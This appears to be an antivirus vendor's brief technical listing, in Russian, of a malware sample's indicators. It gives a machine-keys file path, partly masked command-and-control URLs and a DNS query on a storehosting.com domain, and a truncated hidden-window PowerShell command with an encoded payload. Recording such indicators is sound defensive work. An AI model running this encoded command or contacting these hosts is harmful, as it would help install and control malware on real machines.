Техническая информация
- %PROGRAMDATA%\microsoft\crypto\rsa\machinekeys\571a73d0ff85bc4b5b460655be1dc9e8_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- http://ww##.###storehosting.com/news.php
- http://ww##.###storehosting.com/login/process.php
- DNS ASK ww##.###storehosting.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w 1 -enc SQBGACgAJABQAFMAVgBFAHIAUwBJAG8ATgBUAEEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAG8AbgAuAE0AQQBKAG8AcgAgAC0AZwBlACAAMwApAHsAJABHAFAAUwA9AFsAcgBFAGYAXQAuAEEAcwBzAEUAbQBCAEwAWQAuAEcAZQB0AFQAWQ...' (со скрытым окном)